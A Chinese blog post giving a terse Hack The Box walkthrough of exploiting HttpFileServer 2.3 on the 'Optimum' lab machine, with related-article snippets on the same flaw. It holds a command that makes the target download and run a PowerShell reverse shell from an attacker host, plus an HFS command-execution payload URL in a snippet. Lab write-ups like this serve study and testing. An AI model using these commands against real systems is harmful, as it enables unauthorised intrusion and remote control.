htb-window-4-Optimum-HttpFileServer 2.3

最新推荐文章于 2025-04-26 13:03:50 发布

zgcadmin

最新推荐文章于 2025-04-26 13:03:50 发布

阅读量252

点赞数 2

CC 4.0 BY-SA版权

文章标签： web安全

本文链接：https://blog.youkuaiyun.com/admin741admin/article/details/130350855

nmap

在这里插入图片描述

exploit-HttpFileServer 2.3

在这里插入图片描述

生成ps1反弹shell

在这里插入图片描述

模拟漏洞案例的请求

python 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.5/reverse.ps1')"

在这里插入图片描述

获取flag

在这里插入图片描述

system

Sherlock
生成反弹ps1
漏洞

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zgcadmin

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

CVE-2024-23692： Rejetto HTTP File Server 2.3m Unauthenticated RCE漏洞复现

banliyaoguai的博客

07-11

880

Rejetto是一个流行的开源软件项目，主要是一个轻量级的HTTP文件服务器软件。它最著名的应用是HFS（HTTP File Server），这是一个免费的Web服务器软件，专门用于共享和传输文件。HFS（HTTP File Server）允许用户通过浏览器访问和下载存储在计算机上的文件。它非常轻量级，易于安装和配置，适合个人用户或小型团队在局域网内共享文件。HFS具有简洁的界面和基本的文件管理功能，可以通过简单的设置实现文件夹的共享和访问控制。

CVE-2014-6287漏洞利用

yeshankuangrenaaaaa的博客

07-23

1798

目录CVE-2014-6287漏洞利用漏洞描述参考链接漏洞描述漏洞威胁版本漏洞复现靶机环境准备攻击浏览器方式脚本方式kali-msf工具复现结论 CVE-2014-6287漏洞利用漏洞描述参考链接 CVE-2014-6287 漏洞描述发布时间：2014-09-15漏洞平台：windows 漏洞应用：HttpFileServer_v2.3_search命令执行漏洞 HTTPFileServer是一款专为个人用户所设计的HTTP文件服务器。Rejetto网站提供的HTTPFileServer 2.3b

参与评论您还未登录，请先登录后发表或查看评论

HttpFileServer2.3

10-25

可使用HttpFileServer自建文件下载服务器，通过浏览器即可下载文件

打造个人文件下载服务器：HttpFileServer2.3指南

最新发布

weixin_35748962的博客

04-26

1010

HttpFileServer（HFS）是一款轻量级的个人文件服务器软件，它允许用户通过HTTP协议在局域网或互联网中分享和管理文件。HFS以其简单、快速和易于配置的特点，成为了不少IT专业人员和非专业人士在需要快速搭建个人服务器时的首选。虚拟路径是HttpFileServer中的一个高级功能，允许用户通过一个简短的URL访问存储在不同物理位置上的文件和文件夹。这种功能尤其适用于文件存储分散，但希望用户看到统一文件结构的场景。

利用Metasploit对HFS 2.3渗透攻击提权

渗透测试

05-07

2210

文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结前言针对HFS 2.3漏洞进行渗透测试提权（HFS：HttpFileServer）一、Metasploit中使用数据库开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库使用msfconsole启动metasploit 输入db_statu

qos-htb-开源

05-03

qos-htb是您一直在等待的简单带宽管理解决方案，graphix制作了图表，您可以在一秒钟之内查看到底谁在消耗带宽！

xml-HTB-开源

05-02

xml-HTB是用于自动生成bash脚本的工具，该工具可在Linux上设置HTB。它使用xml配置文件。它易于使用，具有许多功能：多种深度的类，可配置的叶子，u32和fw过滤器，可同时配置两个输入

HTB-Recon:Hackthebox计算机的自动侦查脚本（hackthebox.eu）

03-09

例如： ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话它能做什么在您的主目录中创建一个工作区。创建不同的文件夹以使事情...

HTB-Unified logj4j漏洞

03-27

好的，用户想查找关于HTB-Unified中log4j漏洞的相关信息和解决方案，以及影响范围。首先，我需要确认HTB-Unified是什么。可能是一个硬件设备或软件系统，但根据用户提供的引用内容，之前的引用提到了USB OTG白名单、...

write-ups:来自CTF和HTB演练的文章

03-21

6. **HTB-Walkthroughs（hackthebox htb-walkthroughs）**：具体到Hack The Box平台的靶机攻破过程，详述每个靶机的攻克策略和技巧。文件名称列表中的"write-ups-main"可能是一个包含所有文章的主目录或者文件夹，...

Http File Server(HFS2.3)

01-12

支持断点续传的http文件服务器，轻松架设http文件服务器。非常适合于断点续传的调试和http文件服务器的架设。

Http File Server V2.30 WEB服务器

05-12

Http File Server V2.30

渗透之——Metasploit攻击HFS 2.3上的漏洞

冰河的专栏

01-12

6635

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86358284 攻击机： kali 192.168.109.137 靶机： windows server 2012 192.168.109.141 工具：Metasploit 根据CVE-2014-6287的描述，Rejetto网络文件服务器(也被称为HSF或者HttpFi...

HTTPfileserver rce复现（HFS）

whojoe的博客

07-02

2168

HTTPfileserver rce复现（HFS）环境搭建漏洞复现同一网络环境内网msf小结环境搭建 hfs在比较早的版本存在命令执行漏洞，2.3c及以前的2.3x版本下载链接 http://d3.meisq.net:806/1206/hfshttp.zip 打开之后设置默认运行这里 kaliip192.168.164.129 HFSip192.168.164.128 漏洞复现同一网络环境 kali配置 msfconsole search hfs use exploit/windows/http

渗透实战-HttpFileServer漏洞利用

网络安全领域优质创作者

11-05

2020

nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.49-oX10.11.1.49.xml xsltproc-o10.11.1.49.html10.11.1.49.xml 9505端口运行HttpFileServer服务，搜索HFS得到39161.py修改里面的端口和放置nc.exe 得到shell $secpasswd=ConvertTo-SecureString"aliceishere" -As...

HTTP File Server(X64)

蓦然回首

04-24

2224

自编程序，小伙伴们随意使用。公司内部的电脑由于信息安全的原因，不能插U盘，因此，当同事之间需要传递一些资料的时候很不方便，正好在做网络相关一的项目，顺便就做了这个HTTP文件服务器，功能相当简单，启动程序->设定分享目录->设置服务端口->开启服务。其他人就可以利用浏览器进行访问了。软件图：浏览结果： X64版本：...

国外软件HFS 2.3x 远程命令执行漏洞（本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件）本站教程教习如何梨园远程命令执行。。中国寒龙...

weixin_30537391的博客

09-07

720

这个程序在国内用的特别多，特别是那些抓肉鸡的黑阔。 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注：有些版本search前面是没有?的。测试部分：百度搜HFS默认就是2.3...

HttpFileServer

坚持梦想。。。。

07-09

855

通过HttpFileServer设置共享可以通过http方式访问